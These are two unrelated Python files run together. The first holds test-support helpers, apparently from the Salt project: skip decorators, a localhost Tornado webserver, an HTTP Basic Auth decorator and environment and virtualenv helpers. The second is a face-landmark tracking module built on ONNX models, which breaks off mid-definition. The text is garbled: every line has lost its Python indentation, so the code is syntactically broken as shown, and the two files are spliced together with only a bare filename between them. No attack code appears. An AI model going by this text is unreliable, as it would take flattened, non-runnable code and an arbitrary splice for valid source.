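# values below are hypothetical:
#
#     class MyTestCase(TestCase):
#         @runs_on(kernel="Linux", os=["Ubuntu", "Debian"])
#         def test_only_on_debian_like_linux(self):
#             pass
#         @not_runs_on(os="Windows", reason="This behaviour is POSIX only")
#         def test_not_on_windows(self):
#             pass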
def _check_required_sminion_attributes(sminion_attr, *required_items):
"""
:param sminion_attr: The name of the sminion attribute to check, such as 'functions' or 'states'
:param required_items: The items that must be part of the designated sminion attribute for the decorated test
    :return: The required items that are not available
"""
# Late import
from tests.support.sminion import create_sminion
required_salt_items = set(required_items)
sminion = create_sminion(minion_id="runtests-internal-sminion")
available_items = list(getattr(sminion, sminion_attr))
not_available_items = set()
name = "__not_available_{items}s__".format(items=sminion_attr)
if not hasattr(sminion, name):
setattr(sminion, name, set())
cached_not_available_items = getattr(sminion, name)
for not_available_item in cached_not_available_items:
if not_available_item in required_salt_items:
not_available_items.add(not_available_item)
required_salt_items.remove(not_available_item)
for required_item_name in required_salt_items:
search_name = required_item_name
if "." not in search_name:
search_name += ".*"
if not fnmatch.filter(available_items, search_name):
not_available_items.add(required_item_name)
cached_not_available_items.add(required_item_name)
return not_available_items
def requires_salt_states(*names):
"""
Makes sure the passed salt state is available. Skips the test if not
.. versionadded:: 3000
"""
not_available = _check_required_sminion_attributes("states", *names)
def decorator(caller):
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if not_available:
raise SkipTest("Unavailable salt states: {}".format(*not_available))
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrapper(cls):
if not_available:
raise SkipTest("Unavailable salt states: {}".format(*not_available))
return caller(cls)
return wrapper
return decorator
def requires_salt_modules(*names):
"""
Makes sure the passed salt module is available. Skips the test if not
.. versionadded:: 0.5.2
"""
not_available = _check_required_sminion_attributes("functions", *names)
def decorator(caller):
if inspect.isclass(caller):
# We're decorating a class
old_setup = getattr(caller, "setUp", None)
def setUp(self, *args, **kwargs):
if not_available:
raise SkipTest(
"Unavailable salt modules: {}".format(*not_available)
)
if old_setup is not None:
old_setup(self, *args, **kwargs)
caller.setUp = setUp
return caller
# We're simply decorating functions
@functools.wraps(caller)
def wrapper(cls):
if not_available:
raise SkipTest("Unavailable salt modules: {}".format(*not_available))
return caller(cls)
return wrapper
return decorator
def skip_if_binaries_missing(*binaries, **kwargs):
import salt.utils.path
if len(binaries) == 1:
if isinstance(binaries[0], (list, tuple, set, frozenset)):
binaries = binaries[0]
check_all = kwargs.pop("check_all", False)
message = kwargs.pop("message", None)
if kwargs:
raise RuntimeError(
"The only supported keyword argument is 'check_all' and "
"'message'. Invalid keyword arguments: {0}".format(", ".join(kwargs.keys()))
)
if check_all:
for binary in binaries:
if salt.utils.path.which(binary) is None:
return skip(
"{0}The {1!r} binary was not found".format(
message and "{0}. ".format(message) or "", binary
)
)
elif salt.utils.path.which_bin(binaries) is None:
return skip(
"{0}None of the following binaries was found: {1}".format(
message and "{0}. ".format(message) or "", ", ".join(binaries)
)
)
return _id
def skip_if_not_root(func):
# Late import
from tests.support.runtests import RUNTIME_VARS
if RUNTIME_VARS.PYTEST_SESSION:
setattr(func, "__skip_if_not_root__", True)
if not sys.platform.startswith("win"):
if os.getuid() != 0:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as root to run this test"
)
else:
current_user = salt.utils.win_functions.get_current_user()
if current_user != "SYSTEM":
if not salt.utils.win_functions.is_admin(current_user):
func.__unittest_skip__ = True
func.__unittest_skip_why__ = (
"You must be logged in as an Administrator to run this test"
)
return func
def repeat(caller=None, condition=True, times=5):
"""
    Repeat a test a given number of times until the first failure.
.. code-block:: python
class MyTestCase(TestCase):
@repeat
def test_sometimes_works(self):
pass
"""
if caller is None:
return functools.partial(repeat, condition=condition, times=times)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
repeat(caller=function, condition=condition, times=times),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
result = None
for attempt in range(1, times + 1):
log.info("%s test run %d of %s times", cls, attempt, times)
caller(cls)
return cls
return wrap
def http_basic_auth(login_cb=lambda username, password: False):
"""
A crude decorator to force a handler to request HTTP Basic Authentication
Example usage:
.. code-block:: python
@http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
class AuthenticatedHandler(salt.ext.tornado.web.RequestHandler):
pass
"""
def wrapper(handler_class):
def wrap_execute(handler_execute):
def check_auth(handler, kwargs):
auth = handler.request.headers.get("Authorization")
if auth is None or not auth.startswith("Basic "):
# No username/password entered yet, we need to return a 401
# and set the WWW-Authenticate header to request login.
handler.set_status(401)
handler.set_header("WWW-Authenticate", "Basic realm=Restricted")
else:
# Strip the 'Basic ' from the beginning of the auth header
# leaving the base64-encoded secret
username, password = base64.b64decode(auth[6:]).split(":", 1)
if login_cb(username, password):
# Authentication successful
return
else:
# Authentication failed
handler.set_status(403)
handler._transforms = []
handler.finish()
def _execute(self, transforms, *args, **kwargs):
check_auth(self, kwargs)
return handler_execute(self, transforms, *args, **kwargs)
return _execute
handler_class._execute = wrap_execute(handler_class._execute)
return handler_class
return wrapper
def generate_random_name(prefix, size=6):
"""
Generates a random name by combining the provided prefix with a randomly generated
ascii string.
.. versionadded:: 2018.3.0
prefix
The string to prefix onto the randomly generated ascii string.
size
The number of characters to generate. Default: 6.
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please replace your call 'generate_random_name({0})' with 'random_string({0}, lowercase=False)' as "
"'generate_random_name' will be removed after {{date}}".format(prefix),
)
return random_string(prefix, size=size, lowercase=False)
def random_string(prefix, size=6, uppercase=True, lowercase=True, digits=True):
"""
Generates a random string.
    .. versionadded:: 3001
Args:
prefix(str): The prefix for the random string
size(int): The size of the random string
uppercase(bool): If true, include uppercased ascii chars in choice sample
lowercase(bool): If true, include lowercased ascii chars in choice sample
digits(bool): If true, include digits in choice sample
Returns:
str: The random string
"""
if not any([uppercase, lowercase, digits]):
raise RuntimeError(
"At least one of 'uppercase', 'lowercase' or 'digits' needs to be true"
)
choices = []
if uppercase:
choices.extend(string.ascii_uppercase)
if lowercase:
choices.extend(string.ascii_lowercase)
if digits:
choices.extend(string.digits)
return prefix + "".join(random.choice(choices) for _ in range(size))
class Webserver(object):
"""
Starts a tornado webserver on 127.0.0.1 on a random available port
USAGE:
.. code-block:: python
from tests.support.helpers import Webserver
webserver = Webserver('/path/to/web/root')
webserver.start()
webserver.stop()
"""
def __init__(self, root=None, port=None, wait=5, handler=None):
"""
root
Root directory of webserver. If not passed, it will default to the
location of the base environment of the integration suite's file
roots (tests/integration/files/file/base/)
port
Port on which to listen. If not passed, a random one will be chosen
at the time the start() function is invoked.
wait : 5
Number of seconds to wait for the socket to be open before raising
an exception
handler
Can be used to use a subclass of tornado.web.StaticFileHandler,
such as when enforcing authentication with the http_basic_auth
decorator.
"""
if port is not None and not isinstance(port, six.integer_types):
raise ValueError("port must be an integer")
if root is None:
root = RUNTIME_VARS.BASE_FILES
try:
self.root = os.path.realpath(root)
except AttributeError:
raise ValueError("root must be a string")
self.port = port
self.wait = wait
self.handler = (
handler if handler is not None else salt.ext.tornado.web.StaticFileHandler
)
self.web_root = None
def target(self):
"""
Threading target which stands up the tornado application
"""
self.ioloop = salt.ext.tornado.ioloop.IOLoop()
self.ioloop.make_current()
if self.handler == salt.ext.tornado.web.StaticFileHandler:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler, {"path": self.root})]
)
else:
self.application = salt.ext.tornado.web.Application(
[(r"/(.*)", self.handler)]
)
self.application.listen(self.port)
self.ioloop.start()
@property
def listening(self):
if self.port is None:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
return sock.connect_ex(("127.0.0.1", self.port)) == 0
def url(self, path):
"""
Convenience function which, given a file path, will return a URL that
points to that path. If the path is relative, it will just be appended
to self.web_root.
"""
if self.web_root is None:
raise RuntimeError("Webserver instance has not been started")
err_msg = (
"invalid path, must be either a relative path or a path "
"within {0}".format(self.root)
)
try:
relpath = (
path if not os.path.isabs(path) else os.path.relpath(path, self.root)
)
if relpath.startswith(".." + os.sep):
raise ValueError(err_msg)
return "/".join((self.web_root, relpath))
except AttributeError:
raise ValueError(err_msg)
def start(self):
"""
Starts the webserver
"""
if self.port is None:
self.port = get_unused_localhost_port()
self.web_root = "http://127.0.0.1:{0}".format(self.port)
self.server_thread = threading.Thread(target=self.target)
self.server_thread.daemon = True
self.server_thread.start()
for idx in range(self.wait + 1):
if self.listening:
break
if idx != self.wait:
time.sleep(1)
else:
raise Exception(
"Failed to start tornado webserver on 127.0.0.1:{0} within "
"{1} seconds".format(self.port, self.wait)
)
def stop(self):
"""
Stops the webserver
"""
self.ioloop.add_callback(self.ioloop.stop)
self.server_thread.join()
class SaveRequestsPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Save all requests sent to the server.
"""
received_requests = []
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
self.received_requests.append(self.request)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
class MirrorPostHandler(salt.ext.tornado.web.RequestHandler):
"""
Mirror a POST body back to the client
"""
def post(self, *args): # pylint: disable=arguments-differ
"""
Handle the post
"""
body = self.request.body
log.debug("Incoming body: %s Incoming args: %s", body, args)
self.write(body)
def data_received(self): # pylint: disable=arguments-differ
"""
Streaming not used for testing
"""
raise NotImplementedError()
def dedent(text, linesep=os.linesep):
"""
A wrapper around textwrap.dedent that also sets line endings.
"""
linesep = salt.utils.stringutils.to_unicode(linesep)
unicode_text = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
clean_text = linesep.join(unicode_text.splitlines())
if unicode_text.endswith("\n"):
clean_text += linesep
if not isinstance(text, six.text_type):
return salt.utils.stringutils.to_bytes(clean_text)
return clean_text
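# Illustrative sketch (not part of the original helpers): ``dedent`` strips the common
# leading whitespace like textwrap.dedent, but also normalizes the line separator.
def _dedent_demo():
    text = """
        first line
        second line
    """
    unix_text = dedent(text, linesep="\n")
    windows_text = dedent(text, linesep="\r\n")
    return unix_text, windows_text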
class PatchedEnviron(object):
def __init__(self, **kwargs):
self.cleanup_keys = kwargs.pop("__cleanup__", ())
self.kwargs = kwargs
self.original_environ = None
def __enter__(self):
self.original_environ = os.environ.copy()
for key in self.cleanup_keys:
os.environ.pop(key, None)
# Make sure there are no unicode characters in the self.kwargs if we're
# on Python 2. These are being added to `os.environ` and causing
# problems
if sys.version_info < (3,):
kwargs = self.kwargs.copy()
clean_kwargs = {}
for k in self.kwargs:
key = k
if isinstance(key, six.text_type):
key = key.encode("utf-8")
if isinstance(self.kwargs[k], six.text_type):
kwargs[k] = kwargs[k].encode("utf-8")
clean_kwargs[key] = kwargs[k]
self.kwargs = clean_kwargs
os.environ.update(**self.kwargs)
return self
def __exit__(self, *args):
os.environ.clear()
os.environ.update(self.original_environ)
patched_environ = PatchedEnviron
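# Illustrative sketch (not part of the original helpers): temporarily override and
# clean up environment variables around a block of test code. ``SALT_FAKE_VAR`` is a
# hypothetical variable name and is assumed not to be set beforehand.
def _patched_environ_demo():
    with patched_environ(__cleanup__=("LANG",), SALT_FAKE_VAR="1"):
        assert os.environ.get("SALT_FAKE_VAR") == "1"
        assert "LANG" not in os.environ
    # outside the block the original environment is restored
    return os.environ.get("SALT_FAKE_VAR") is None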
class VirtualEnv(object):
def __init__(self, venv_dir=None):
self.venv_dir = venv_dir or tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
if salt.utils.platform.is_windows():
self.venv_python = os.path.join(self.venv_dir, "Scripts", "python.exe")
else:
self.venv_python = os.path.join(self.venv_dir, "bin", "python")
def __enter__(self):
try:
self._create_virtualenv()
except subprocess.CalledProcessError:
raise AssertionError("Failed to create virtualenv")
return self
def __exit__(self, *args):
shutil.rmtree(self.venv_dir, ignore_errors=True)
def install(self, *args):
subprocess.check_call([self.venv_python, "-m", "pip", "install"] + list(args))
def _get_real_python(self):
"""
        Virtualenv creation is proxied by this function mostly because, under Windows,
        we can't seem to properly create a virtualenv off of another virtualenv (we can
        on Linux), and also because we really don't want to test virtualenv creation off
        of another virtualenv; we want a virtualenv created from the original python.
        Also, on Windows, we must point to the virtualenv binary outside the existing
        virtualenv because it will fail otherwise.
"""
try:
if salt.utils.platform.is_windows():
return os.path.join(sys.real_prefix, os.path.basename(sys.executable))
else:
python_binary_names = [
"python{}.{}".format(*sys.version_info),
"python{}".format(*sys.version_info),
"python",
]
for binary_name in python_binary_names:
python = os.path.join(sys.real_prefix, "bin", binary_name)
if os.path.exists(python):
break
else:
raise AssertionError(
"Couldn't find a python binary name under '{}' matching: {}".format(
os.path.join(sys.real_prefix, "bin"), python_binary_names
)
)
return python
except AttributeError:
return sys.executable
def _create_virtualenv(self):
sminion = create_sminion()
sminion.functions.virtualenv.create(
self.venv_dir, python=self._get_real_python()
)
|
tracker.py
|
import os
import numpy as np
import math
import cv2
import onnxruntime
import time
import queue
import threading
import copy
from retinaface import RetinaFaceDetector
from remedian import remedian
def resolve(name):
f = os.path.join(os.path.dirname(__file__), name)
return f
def clamp_to_im(pt, w, h):
x = pt[0]
y = pt[1]
if x < 0:
x = 0
if y < 0:
y = 0
if x >= w:
x = w-1
if y >= h:
y = h-1
return (int(x), int(y+1))
def rotate(origin, point, a):
a = -a
ox, oy = origin
px, py = point
qx = ox + math.cos(a) * (px - ox) - math.sin(a) * (py - oy)
qy = oy + math.sin(a) * (px - ox) + math.cos(a) * (py - oy)
return qx, qy
def angle(p1, p2):
p1 = np.array(p1)
p2 = np.array(p2)
a = np.arctan2(*(p2 - p1)[::-1])
return (a % (2 * np.pi))
def compensate(p1, p2):
a = angle(p1, p2)
return rotate(p1, p2, a), a
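# Illustrative sketch (not part of the original tracker): ``angle`` measures the
# direction from p1 to p2, ``rotate`` turns a point around an origin by that angle,
# and ``compensate`` uses both to map p2 onto the horizontal axis through p1.
def _rotation_helpers_demo():
    p1 = (0.0, 0.0)
    p2 = (1.0, 1.0)
    a = angle(p1, p2)                 # pi / 4, i.e. 45 degrees
    aligned, a_used = compensate(p1, p2)
    # after compensation p2 lies on the x axis: roughly (sqrt(2), 0)
    return a, aligned, a_used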
def rotate_image(image, a, center):
(h, w) = image.shape[:2]
a = np.rad2deg(a)
M = cv2.getRotationMatrix2D((center[0], center[1]), a, 1.0)
rotated = cv2.warpAffine(image, M, (w, h))
return rotated
def intersects(r1, r2, amount=0.3):
area1 = r1[2] * r1[3]
area2 = r2[2] * r2[3]
inter = 0.0
total = area1 + area2
r1_x1, r1_y1, w, h = r1
r1_x2 = r1_x1 + w
r1_y2 = r1_y1 + h
r2_x1, r2_y1, w, h = r2
r2_x2 = r2_x1 + w
r2_y2 = r2_y1 + h
left = max(r1_x1, r2_x1)
right = min(r1_x2, r2_x2)
top = max(r1_y1, r2_y1)
bottom = min(r1_y2, r2_y2)
if left < right and top < bottom:
inter = (right - left) * (bottom - top)
total -= inter
if inter / total >= amount:
return True
return False
#return not (r1_x1 > r2_x2 or r1_x2 < r2_x1 or r1_y1 > r2_y2 or r1_y2 < r2_y1)
def group_rects(rects):
rect_groups = {}
for rect in rects:
rect_groups[str(rect)] = [-1, -1, []]
group_id = 0
for i, rect in enumerate(rects):
name = str(rect)
group = group_id
group_id += 1
if rect_groups[name][0] < 0:
rect_groups[name] = [group, -1, []]
else:
group = rect_groups[name][0]
for j, other_rect in enumerate(rects):
            if i == j:
                continue
            if intersects(rect, other_rect):
rect_groups[str(other_rect)] = [group, -1, []]
return rect_groups
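# Illustrative sketch (not part of the original tracker): two (x, y, w, h) rectangles
# count as intersecting when their overlap covers at least ``amount`` of their union.
def _intersects_demo():
    a = (0, 0, 10, 10)
    b = (5, 5, 10, 10)    # 25 units of overlap out of a 175 unit union (~14%)
    c = (100, 100, 5, 5)  # no overlap at all
    return intersects(a, b, amount=0.1), intersects(a, c)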
def logit(p, factor=16.0):
if p >= 1.0:
p = 0.9999999
if p <= 0.0:
p = 0.0000001
p = p/(1-p)
return float(np.log(p)) / float(factor)
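# Illustrative sketch (not part of the original tracker): ``logit`` converts a
# confidence-like value in (0, 1) into a scaled log-odds value, clamping the input
# so the logarithm never sees exactly 0 or 1.
def _logit_demo():
    low = logit(0.1)    # negative: odds below 1
    mid = logit(0.5)    # 0.0: even odds
    high = logit(0.99)  # positive, compressed by the default factor of 16
    return low, mid, high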
def matrix_to_quaternion(m):
t = 0.0
q = [0.0, 0.0, 0, 0.0]
if m[2,2] < 0:
if m[0,0] > m[1,1]:
t = 1 + m[0,0] - m[1,1] - m[2,2]
q = [t, m[0,1]+m[1,0], m[2,0]+m[0,2], m[1,2]-m[2,1]]
else:
t = 1 - m[0,0] + m[1,1] - m[2,2]
q = [m[0,1]+m[1,0], t, m[1,2]+m[2,1], m[2,0]-m[0,2]]
else:
if m[0,0] < -m[1,1]:
t = 1 - m[0,0] - m[1,1] + m[2,2]
q = [m[2,0]+m[0,2], m[1,2]+m[2,1], t, m[0,1]-m[1,0]]
else:
t = 1 + m[0,0] + m[1,1] + m[2,2]
q = [m[1,2]-m[2,1], m[2,0]-m[0,2], m[0,1]-m[1,0], t]
q = np.array(q, np.float32) * 0.5 / np.sqrt(t)
return q
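# Illustrative sketch (not part of the original tracker): the conversion uses the usual
# branch-per-largest-diagonal scheme and returns the scalar component last, so the
# identity rotation maps to approximately (0, 0, 0, 1).
def _matrix_to_quaternion_demo():
    identity = np.eye(3, dtype=np.float32)
    q = matrix_to_quaternion(identity)
    # q is approximately [0., 0., 0., 1.]
    return q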
def worker_thread(session, frame, input, crop_info, queue, input_name, idx, tracker):
output = session.run([], {input_name: input})[0]
conf, lms = tracker.landmarks(output[0], crop_info)
if conf > tracker.threshold:
eye_state = tracker.get_eye_state(frame, lms, single=True)
queue.put((session, conf, (lms, eye_state), crop_info, idx))
else:
queue.put((session,))
class Feature():
def __init__(self, threshold=0.15, alpha=0.2, hard_factor=0.15, decay=0.001):
self.median = remedian()
self.min = None
self.max = None
self.hard_min = None
self.hard_max = None
self.threshold = threshold
self.alpha = alpha
self.hard_factor = hard_factor
self.decay = decay
self.last = 0
def update(self, x):
new = self.update_state(x)
filtered = self.last * self.alpha + new * (1 - self.alpha)
self.last = filtered
return filtered
def update_state(self, x):
self.median + x
median = self.median.median()
if self.min is None:
if x < median and (median - x) / median > self.threshold:
self.min = x
self.hard_min = self.min + self.hard_factor * (median - self.min)
return -1
return 0
else:
if x < self.min:
self.min = x
self.hard_min = self.min + self.hard_factor * (median - self.min)
return -1
if self.max is None:
if x > median and (x - median) / median > self.threshold:
self.max = x
self.hard_max = self.max - self.hard_factor * (self.max - median)
return 1
return 0
else:
if x > self.max:
self.max = x
self.hard_max = self.max - self.hard_factor * (self.max - median)
return 1
if self.min < self.hard_min:
self.min = self.hard_min * self.decay + self.min * (1 - self.decay)
if self.max > self.hard_max:
self.max = self.hard_max * self.decay + self.max * (1 - self.decay)
if x < median:
return - (1 - (x - self.min) / (median - self.min))
elif x > median:
return (x - median) / (self.max - median)
return 0
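# Illustrative sketch (not part of the original tracker): a Feature calibrates its own
# min/median/max online and maps raw measurements into roughly [-1, 1], smoothing the
# result with ``alpha``. The readings below are arbitrary example values; the sketch
# assumes the bundled ``remedian`` running median behaves as used by update_state above.
def _feature_demo():
    f = Feature(threshold=0.1, alpha=0.5)
    readings = [1.0, 1.0, 1.05, 0.7, 1.3, 1.0, 0.75, 1.25]
    outputs = [f.update(x) for x in readings]
    return outputs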
class FeatureExtractor():
def __init__(self):
self.eye_l = Feature()
self.eye_r = Feature()
self.eyebrow_updown_l = Feature()
self.eyebrow_updown_r = Feature()
self.eyebrow_quirk_l = Feature(threshold=0.05)
self.eyebrow_quirk_r = Feature(threshold=0.05)
self.eyebrow_steepness_l = Feature(threshold=0.05)
self.eyebrow_steepness_r = Feature(threshold=0.05)
self.mouth_corner_updown_l = Feature()
self.mouth_corner_updown_r = Feature()
self.mouth_corner_inout_l = Feature(threshold=0.02)
self.mouth_corner_inout_r = Feature(threshold=0.02)
self.mouth_open = Feature()
self.mouth_wide = Feature(threshold=0.02)
def align_points(self, a, b, pts):
a = tuple(a)
b = tuple(b)
alpha = angle(a, b)
alpha = np.rad2deg(alpha)
if alpha >= 90:
alpha = - (alpha - 180)
if alpha <= -90:
alpha = - (alpha + 180)
alpha = np.deg2rad(alpha)
aligned_pts = []
for pt in pts:
aligned_pts.append(np.array(rotate(a, pt, alpha)))
return alpha, np.array(aligned_pts)
def update(self, pts):
features = {}
norm_distance_x = np.mean([pts[0, 0] - pts[16, 0], pts[1, 0] - pts[15, 0]])
norm_distance_y = np.mean([pts[27, 1] - pts[28, 1], pts[28, 1] - pts[29, 1], pts[29, 1] - pts[30, 1]])
a1, f_pts = self.align_points(pts[42], pts[45], pts[[43, 44, 47, 46]])
f = np.clip((np.mean([f_pts[0,1], f_pts[1,1]]) - np.mean([f_pts[2,1], f_pts[3,1]])) / norm_distance_y, 0, None)
features["eye_l"] = self.eye_l.update(f)
a2, f_pts = self.align_points(pts[36], pts[39], pts[[37, 38, 41, 40]])
f = np.clip((np.mean([f_pts[0,1], f_pts[1,1]]) - np.mean([f_pts[2,1], f_pts[3,1]])) / norm_distance_y, 0, None)
features["eye_r"] = self.eye_r.update(f)
a3, _ = self.align_points(pts[0], pts[16], [])
a4, _ = self.align_points(pts[31], pts[35], [])
norm_angle = np.mean(list(map(np.rad2deg, [a1, a2, a3, a4])))
a, f_pts = self.align_points(pts[22], pts[26], pts[[22, 23, 24, 25, 26]])
features["eyebrow_steepness_l"] = self.eyebrow_steepness_l.update(-np.rad2deg(a) - norm_angle)
f = (np.mean([pts[22, 1], pts[26, 1]]) - pts[27, 1]) / norm_distance_y
features["eyebrow_updown_l"] = self.eyebrow_updown_l.update(f)
f = np.max(np.abs(np.array(f_pts[1:4]) - f_pts[0, 1])) / norm_distance_y
features["eyebrow_quirk_l"] = self.eyebrow_quirk_l.update(f)
a, f_pts = self.align_points(pts[17], pts[21], pts[[17, 18, 19, 20, 21]])
features["eyebrow_steepness_r"] = self.eyebrow_steepness_r.update(np.rad2deg(a) - norm_angle)
f = (np.mean([pts[17, 1], pts[21, 1]]) - pts[27, 1]) / norm_distance_y
features["eyebrow_updown_r"] = self.eyebrow_updown_r.update(f)
f = np.max(np.abs(np.array(f_pts[1:4]) - f_pts[0, 1])) / norm_distance_y
features["eyebrow_quirk_r"] = self.eyebrow_quirk_r.update(f)
upper_mouth_line = np.mean([pts[49, 1], pts[50, 1], pts[51, 1]])
center_line = np.mean([pts[50, 0], pts[60, 0], pts[27, 0], pts[30, 0], pts[64, 0], pts[55, 0]])
f = (upper_mouth_line - pts[62, 1]) / norm_distance_y
features["mouth_corner_updown_l"] = self.mouth_corner_updown_l.update(f)
f = abs(center_line - pts[62, 0]) / norm_distance_x
features["mouth_corner_inout_l"] = self.mouth_corner_inout_l.update(f)
f = (upper_mouth_line - pts[58, 1]) / norm_distance_y
features["mouth_corner_updown_r"] = self.mouth_corner_updown_r.update(f)
f = abs(center_line - pts[58, 0]) / norm_distance_x
features["mouth_corner_inout_r"] = self.mouth_corner_inout_r.update(f)
f = (np.mean([pts[59, 1], pts[60, 1], pts[61, 1]]) - np.mean([pts[65, 1], pts[64, 1], pts[63, 1]])) / norm_distance_y
features["mouth_open"] = self.mouth_open.update(f)
f = abs(pts[58, 0] - pts[62, 0]) / norm_distance_x
features["mouth_wide"] = self.mouth_wide.update(f)
return features
class FaceInfo():
def __init__(self, id, tracker):
self.id = id
self.frame_count = -1
self.tracker = tracker
self.contour_pts = [0,1,8,15,16,27,28,29,30,31,32,33,34,35,36,39,42,45]
self.face_3d = copy.copy(self.tracker.face_3d)
self.reset()
self.alive = False
self.coord = None
self.base_scale_v = self.tracker.face_3d[27:30, 1] - self.tracker.face_3d[28:31, 1]
self.base_scale_h = np.abs(self.tracker.face_3d[[0, 36, 42], 0] - self.tracker.face_3d[[16, 39, 45], 0])
self.limit_3d_adjustment = True
self.update_count_delta = 75.
self.update_count_max = 7500.
def reset(self):
self.alive = False
self.conf = None
self.lms = None
self.eye_state = None
self.rotation = None
self.translation = None
self.success = None
self.quaternion = None
self.euler = None
self.pnp_error = None
self.pts_3d = None
self.eye_blink = None
self.bbox = None
self.pnp_error = 0
self.features = FeatureExtractor()
self.current_features = {}
self.contour = np.zeros((21,3))
self.update_counts = np.zeros((66,2))
self.update_contour()
self.fail_count = 0
def update(self, result, coord, frame_count):
self.frame_count = frame_count
if result is None:
self.reset()
else:
self.conf, (self.lms, self.eye_state) = result
self.coord = coord
self.alive = True
def update_contour(self):
self.contour = np.array(self.face_3d[self.contour_pts])
def normalize_pts3d(self, pts_3d):
# Calculate angle using nose
pts_3d[:, 0:2] -= pts_3d[30, 0:2]
alpha = angle(pts_3d[30, 0:2], pts_3d[27, 0:2])
alpha -= np.deg2rad(90)
R = np.matrix([[np.cos(alpha), -np.sin(alpha)], [np.sin(alpha), np.cos(alpha)]])
pts_3d[:, 0:2] = (pts_3d - pts_3d[30])[:, 0:2].dot(R) + pts_3d[30, 0:2]
# Vertical scale
pts_3d[:, 1] /= np.mean((pts_3d[27:30, 1] - pts_3d[28:31, 1]) / self.base_scale_v)
# Horizontal scale
pts_3d[:, 0] /= np.mean(np.abs(pts_3d[[0, 36, 42], 0] - pts_3d[[16, 39, 45], 0]) / self.base_scale_h)
return pts_3d
def adjust_3d(self):
if self.conf < 0.4 or self.pnp_error > 300:
return
max_runs = 1
eligible = np.delete(np.arange(0, 66), [30])
changed_any = False
update_type = -1
d_o = np.ones((66,))
d_c = np.ones((66,))
for runs in range(max_runs):
r = 1.0 + np.random.random_sample((66,3)) * 0.02 - 0.01
r[30, :] = 1.0
if self.euler[0] > -165 and self.euler[0] < 145:
continue
elif self.euler[1] > -10 and self.euler[1] < 20:
r[:, 2] = 1.0
update_type = 0
else:
r[:, 0:2] = 1.0
if self.euler[2] > 120 or self.euler[2] < 60:
continue
# Enable only one side of the points, depending on direction
elif self.euler[1] < -10:
update_type = 1
r[[0, 1, 2, 3, 4, 5, 6, 7, 17, 18, 19, 20, 21, 31, 32, 36, 37, 38, 39, 40, 41, 48, 49, 56, 57, 58, 59, 65], 2] = 1.0
eligible = [8, 9, 10, 11, 12, 13, 14, 15, 16, 22, 23, 24, 25, 26, 27, 28, 29, 33, 34, 35, 42, 43, 44, 45, 46, 47, 50, 51, 52, 53, 54, 55, 60, 61, 62, 63, 64]
else:
update_type = 1
r[[9, 10, 11, 12, 13, 14, 15, 16, 22, 23, 24, 25, 26, 34, 35, 42, 43, 44, 45, 46, 47, 51, 52, 53, 54, 61, 62, 63], 2] = 1.0
eligible = [0, 1, 2, 3, 4, 5, 6, 7, 8, 17, 18, 19, 20, 21, 27, 28, 29, 31, 32, 33, 36, 37, 38, 39, 40, 41, 48, 49, 50, 55, 56, 57, 58, 59, 60, 64, 65]
if self.limit_3d_adjustment:
eligible = np.nonzero(self.update_counts[:, update_type] < self.update_counts[:, abs(update_type - 1)] + self.update_count_delta)[0]
if eligible.shape[0] <= 0:
break
if runs == 0:
updated = copy.copy(self.face_3d[0:66])
o_projected = np.ones((66,2))
o_projected[eligible] = np.squeeze(np.array(cv2.projectPoints(self.face_3d[eligible], self.rotation, self.translation, self.tracker.camera, self.tracker.dist_coeffs)[0]), 1)
c = updated * r
c_projected = np.zeros((66,2))
c_projected[eligible] = np.squeeze(np.array(cv2.projectPoints(c[eligible], self.rotation, self.translation, self.tracker.camera, self.tracker.dist_coeffs)[0]), 1)
changed = False
d_o[eligible] = np.linalg.norm(o_projected[eligible] - self.lms[eligible, 0:2], axis=1)
d_c[eligible] = np.linalg.norm(c_projected[eligible] - self.lms[eligible, 0:2], axis=1)
indices = np.nonzero(d_c < d_o)[0]
if indices.shape[0] > 0:
if self.limit_3d_adjustment:
indices = np.intersect1d(indices, eligible)
if indices.shape[0] > 0:
self.update_counts[indices, update_type] += 1
updated[indices] = c[indices]
o_projected[indices] = c_projected[indices]
changed = True
changed_any = changed_any or changed
if not changed:
break
if changed_any:
# Update weighted by point confidence
weights = np.zeros((66,3))
weights[:, :] = self.lms[0:66, 2:3]
weights[weights > 0.7] = 1.0
weights = 1.0 - weights
update_indices = np.arange(0, 66)
if self.limit_3d_adjustment:
update_indices = np.nonzero(self.update_counts[:, update_type] <= self.update_count_max)[0]
self.face_3d[update_indices] = self.face_3d[update_indices] * weights[update_indices] + updated[update_indices] * (1. - weights[update_indices])
self.update_contour()
self.pts_3d = self.normalize_pts3d(self.pts_3d)
self.current_features = self.features.update(self.pts_3d[:, 0:2])
self.eye_blink = []
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_r"]), 1))
self.eye_blink.append(1 - min(max(0, -self.current_features["eye_l"]), 1))
class Tracker():
def __init__(self, width, height, model_type=3, threshold=0.6, max_faces=1, discard_after=5, scan_every=3, bbox_growth=0.0, max_threads=4, silent=False, model_dir=None, no_gaze=False, use_retinaface=False):
options = onnxruntime.SessionOptions()
options.inter_op_num_threads = 1
options.intra_op_num_threads = max(max_threads,4)
options.execution_mode = onnxruntime.ExecutionMode.ORT_SEQUENTIAL
options.graph_optimization_level = onnxruntime.GraphOptimizationLevel.ORT_ENABLE_ALL
options.log_severity_level = 3
self.model_type = model_type
self.models = [
"mnv3_opt_very_fast.onnx",
"mnv3_opt_fast.onnx",
